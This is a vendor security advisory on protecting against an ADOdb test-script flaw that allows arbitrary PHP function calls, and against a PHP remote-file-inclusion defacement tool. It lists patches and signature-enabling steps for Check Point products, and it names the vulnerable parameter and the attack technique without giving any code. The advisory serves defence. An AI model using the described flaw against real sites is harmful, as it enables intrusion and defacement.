Home Page | Skip to Navigation | Skip to Content | Skip to Search | Skip to Footer

Update Protection against Multiple PHP-based Vulnerabilities

Subscribe

Check Point Reference: CPAI-2006-011
Date Published:
Severity:
Last Updated:
Source: FrSIRT/ADV-2006-0101
SANS organization
Industry Reference(s): CVE-2006-0146
Protection Provided by: VPN-1
  • NGX R60
  • NG with Application Intelligence R55W
  • NG with Application Intelligence R55
  • NG with Application Intelligence R54
InterSpect
  • NGX
  • 2.0 and 1.x
Who is Vulnerable?
ADOdb version 4.68 (for PHP) and prior
Defacing Tool 2.0 by r3v3ng4ns
Vulnerability Description
ADOdb is a database abstraction library for PHP. A vulnerability was detected in ADOdb due to the presence pf an insecure ADOdb script that can be exploited by remote attackers to execute malicious PHP commands on the target system.
The 'Defacing Tool 2.0 by r3v3ng4ns' is a suite of php based scripts intended to deface Websites leveraging PHP remote file inclusion. Recently reports have been on the rise on aggressive scanning activity leveraging this tool suite. using this tool, attackers can deface PHP enabled Web sites.
Update/Patch Available
ADOdb:
Upgrade to ADOdb version 4.70 :
http://sourceforge.net/project/showfiles.php?group_id=42718
Vulnerability Details
ADOdb vulnerability: An input validation error exists in the "tests/tmssql.php" test script that does not properly validate the "do" parameter. This could be exploited by attackers to call arbitrary PHP functions.

Defacing Tool 2.0 by r3v3ng4ns: This tool targets Web hosts that enable the use of remote includes. Various reports received lately have indicated site defacement leveraging this tool.

Protection Overview
The Update enables the HTTP Worm Catcher to detect and block the vulnerability based on predefined worm signatures.

To configure the defense, select your product from the list below and follow the related protection steps.

Additional Information
The update also includes the following protections:

  • Oracle XDB FTP Buffer Overflow (CPAI-2006-008)
  • Microsoft Windows Embedded Opentype Fonts (EOT) (CPAI-2006-010)
  • HP OpenView Remote Command Execution (CPAI-2006-012)
  • Oracle XDB HTTP Buffer Overflow (CPAI-2006-013)
  • Apache Format String1 and string2 (CPAI-2006-014)

VPN-1 NGX R60

How Can I Protect My Network?
Users of VPN-1 NGX R60 should update their SmartDefense by clicking Online Update in the SmartDashboard General window.

To enable the protection:

1. In the Web Intelligence tree, click Malicious Code > General HTTP Worm Catcher.
2. Enable the following patterns:
HP ADOdb Test Scripts
PHP shell/web defacement tool
3. Install security policy on all modules. 
 

How Do I Know if My Network is Under Attack?
SmartView Tracker will log the following entries:

Attack Name: HTTP Worm Catcher
Attack Information:
HP ADOdb Test Scripts
PHP shell/web defacement tool

InterSpect NGX

How Can I Protect My Network?
Users of InterSpect NGX should update their systems: In the left pane from the drop-down list, select Profiles > SmartDefense Service and click the Online Update button.

To enable the protection:

1. In the left pane, select Profiles > Default Protection and select the Web Intelligence page of the profile.  

2. In the Web Intelligence tree, click Malicious Code > General HTTP Worm Catcher.
3. On the Worm Patterns list, enable
PHP shell Web defacement tool
PHP ADOdb Test Scripts
4. Install security policy on all modules.

How Do I Know if My Network is Under Attack?
SmartView Tracker will log the following entries:

Attack Name: HTTP Worm Catcher
Attack Information:
PHP shell Web defacement tool
PHP ADOdb Test Scripts

VPN-1 NG with Application Intelligence R55W

How Can I Protect My Network?

Users of VPN-1 NG with Application Intelligence R55W and users of VPN-1 NGX R60 should update their SmartDefense by clicking Online Update in the SmartDashboard General window.

To enable the protection:
1. On the Web Intelligence tree, click Malicious Code > General HTTP Worm Catcher.
2. In the Worm Patterns table, Enable
PHP ADOdb Test Scripts
php shell web defacement tool
3. Install security policy on all modules.

How Do I Know if My Network is Under Attack?
SmartView Tracker will log the following entries:

Attack Name: HTTP Worm Catcher
Attack Information:
PHP ADOdb Test Scripts
php shell web defacement tool

VPN-1 NG with Application Intelligence R55/R54

How Can I Protect My Network?
Users of VPN-1 NG with Application Intelligence R55/R54 should update their SmartDefense by clicking Update Now in the SmartDashboard General window.

To enable the protection:

1. On the SmartDefense tree, click Application Intelligence > Web and enable General HTTP Worm Catcher.
2. Enable the following patterns:
PHP ADOdb Test Scripts
PHP shell/web defacement tool
3. Install security policy on all modules.

How Do I Know if My Network is Under Attack?

SmartView Tracker will log the following entries:

Attack Name: HTTP Worm Catcher
Attack Information:
PHP ADOdb Test Scripts
PHP shell/web defacement tool

InterSpect 2.0, 1.x

How Can I Protect My Network?
Users of InterSpect 2.0, 1.x should update their SmartDefense by clicking Online Update in the SmartDashboard General window.

To enable the protection:

1. On the SmartDefense tree, click Malicious CoCode > General HTTP Worm Defender.
2. Enable the following patterns:
PHP ADOdb Test Scripts
PHP shell/web defacement tool
3. Install policy on all modules.

How Do I Know if My Network is Under Attack?

SmartView Tracker will log the following entries:

Attack Name: HTTP Worm Catcher
Attack Information:
PHP ADOdb Test Scripts
PHP shell/web defacement tool